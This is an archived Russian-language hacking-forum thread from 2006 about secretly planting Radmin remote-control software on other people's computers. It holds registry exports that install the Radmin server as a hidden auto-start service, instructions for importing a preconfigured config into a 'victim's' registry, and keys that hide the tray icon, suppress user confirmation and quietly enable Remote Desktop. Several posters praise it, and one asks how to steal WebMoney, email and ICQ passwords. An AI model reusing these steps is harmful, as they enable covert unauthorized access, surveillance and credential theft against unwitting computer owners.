ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.04.2006, 20:56
|
|
Новичок
Регистрация: 15.02.2005
Сообщений: 12
Провел на форуме:
68084
Репутация:
2
|
|
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):22,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,76,00,41,04,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,22,00,20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00,00,00
"DisplayName"="Remote Administrator Service"
"ObjectName"="LocalSystem"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server\Enum]
"0"="Root\\LEGACY_R_SERVER\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
|
|
|
03.04.2006, 23:35
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
Я вот закинул РАдмина на комп... удаленный доступ... и т.д. но меня интересует как скамуниздить пассы от ВебМани, от Мыля, Аси и т.д.?
и еще как можно полазить по сетки, если она есть?
Последний раз редактировалось Grema; 03.04.2006 в 23:40..
|
|
|
|
04.04.2006, 00:05
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
Запусти у него нужные программы и будет тебе счатсье, от вебмани тебе потребуются еще ключи (:
Вроде всЁ )
|
|
|
|
04.04.2006, 00:48
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 367
Провел на форуме:
686219
Репутация:
26
|
|
Зверская статья.
ОТЛИЧНО!!!
|
|
|
|
04.04.2006, 22:19
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
Сообщение от NaX[no]r†
Запусти у него нужные программы и будет тебе счатсье, от вебмани тебе потребуются еще ключи (:
Вроде всЁ )
А поточнее о прогах можно?
|
|
|
|
01.07.2006, 06:01
|
|
Познающий
Регистрация: 25.06.2006
Сообщений: 55
Провел на форуме:
79099
Репутация:
0
|
|
Возникла проблема, все сделал как здесь описано, но при запуске viewera при подключении к хосту возникает проблема.
короче коннектюсь
ввожу пароль, а дальше выскакивает окошко loading initial screen и все пропадает и ноль эмоций
у меня система windows 2003 sp1
у удаленного компа windows 2003
при подключении к другим компам с win 2000 или win xp все пашет.
подскажите плз, в чем дело, может это не работает для win 2003?
|
|
|
|
02.07.2006, 00:28
|
|
Познающий
Регистрация: 25.06.2006
Сообщений: 55
Провел на форуме:
79099
Репутация:
0
|
|
Как оказалось этот faq бесполезен для windows 2003 server, а так как эту версию в основном используют админы, то лучше научиться использовать удаленный рабочий стол.
При подключении к radmin установленный на другой машине не работает видео драйвер, а только телнет.
ну а если вы смогли через шелл залить софт тогда вам telnet нафиг не нужен.
короче статья мусор и старье.
автор почитай офиициальный форум radmin, столько ошибок и несуразностей наверное есть только у IE.
|
|
|
|
19.07.2006, 00:02
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Наконец вышла третья более менее рабочая ветка Радмина.
Серверная часть.
До этого сервак бетки разрешпл лиш чат и голосовое общение.
Теперь и весь основной функционал работает.
Советую все качнуть пока ещё бесплатную 3-бетту, а то потом будете лицензию искать.
Да, под 2003 виндой в старых версиях не работал раб.стол, но и без этого жить можно, вы же не фильм залезли посмотреть =)
Теперь добавлена поддержка рабстола в Win2003 на уровне драйвера:
"Supports Windows 95/98/Me/NT4/2000/XP/2003, full Windows XP compatibility"
...а в "Диспетчере Устройств" у вас будет почётно красоваться "Radmin Mirror Driver V3" рядом с видюхой и тюнером.
Пока сервер не палится антивирусами 
Теперь о неприятном:
- иконку из трея убрать просто так нельзя.
Видимо, это особенность этой версии и возможно, что позже всё вернут.
В настройках нет такого пункта. Но даже после прямой прописки параметра в реестре сервер просто отказывается запускаться.
Редактирование иконки сервера на бесцветную также не даёт желаемого результата(встроена какая-то проверка целостности).
- Установку из консоли убрали, потому просто так нельзя его поднять из командной строки, хотя управлять по прежнему можно(/start /stop).
Нужно для начала прописать драйвер в системе через реестр(Название сервиса "Radmin Server V3"), тогда он появится(внимание, потребуется перезагрузка).
Помните, что теперь ВСЕ параметры в реестре шифруются, потому нужно заранее сконфигуроровать сервак у себя, а затем сделать экспорт из реестра и внести его в реестр жертвы.
У меня в реестре за службу третьего радмина отвечают : http://sec-123.narod.ru/radmin/Radmin_3.rar
Для работоспособности серверу требуется несколько файлов. Поддержку каждого модуля реализует отдельная библиотека.
Рабочая директория: "C:\WINDOWS\system32\rserver30\"
В "C:\Program Files\Radmin Server 3.0" только деинсталятор.
Теперь о клиенте(вьювер).
Внимание! Вьювер они тоже обновили, причём старый третий вьювер не совместим с новым сервером.
Так что не ленитесь - закачать новый.
Как всегда, вьювер 3 совместим со всеми 2.х серверами радмина.
Незабывайте, что база контактов в 2.х вьюверах была в [HKEY_CURRENT_USER\Software\RAdmin\v2.0\Clients],
а в 3-ем вьювере она хранится "C:\Documents and Settings\username\Application Data\Radmin\radmin.rpb"
Это я к тому, что гуляя по чужой машине незабудьте проверить эти места - в хозяйстве пригодятся =)
Кстати, вьювером можно управлять из командной строки!
Только не знаю, зачем нужно такое извращение, разве что для написания авто-скриптов, например, для массового выключения парка копьютеров по окончании раб.дня. В хелпе найдёте ключи управления.
По поводу настроек сервера в реестре.
Идём в хелп - как, всегда всё что надо =)
Код:
IP filter settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\FilterIp
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\iplist\
Show confirmation dialog option:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\AskUser
Sets default value of auto-answer:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\AutoAllow
Disable tray icon flag option:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableTrayIcon
Logfile settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\EnableLogFile
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\LogFilePath
Password for Radmin server (encrypted):
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\Parameter
Port number settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\Port
Enable NT security flag:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\NTAuthEnabled
User list for NT security support:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Users\
Disallows changes:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisallowChanges
Disables beep:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableBeep
Disables various connection types:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableRedirect
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableScreen
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableView
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableTelnet
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableFile
License key:
HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType\Data
Uninstallation:
To uninstall execute:
%windir%\system32\r_server.exe /stop
%windir%\system32\r_server.exe /uninstall /silence
Delete all Radmin files.
|
|
|
|
19.07.2006, 14:14
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Да, кстати, насчёт R emote Desktop.
Подробное описание здесь:
ХР-АДМИНИСТРАЦИЯ - удаленный помощник WinXP
Замечу, что для Win2003 не требуется завершение сеанса активного пользователя!
У вас появляется раб стол юзера, но при этом мышка и клава у вас "своя"
Таким образом Вы НИЧЕМ не выдаёте своё присутствие, в отличие от управления Радмином.
Вот параметры в реестре, активирующие Remote Desktop (без перезагрузки).
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]
"fAllowToGetHelp"=dword:00000001
"fDenyTSConnections"=dword:00000000
Да, должна быть запущена "Cлужба терминалов" (в Win2003 запущена по дефаулту, в ХР - нет)
Посмотреть список запущенных служб так:
Если нет "Cлужба терминалов" - запустить так:
|
|
|
|
29.07.2006, 14:18
|
|
Новичок
Регистрация: 15.01.2006
Сообщений: 7
Провел на форуме:
15513
Репутация:
0
|
|
А он неведёт некаких логов..? Есть вазможность проверить после работи..,с какого ип конектилисй.., и так далее? Или ето более мениее безопасно..?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.jpg?132988){kind=avatar}
![Отправить сообщение для NaX[no]rT с помощью ICQ](fusion/misc/im_icq.gif)
Линейный вид
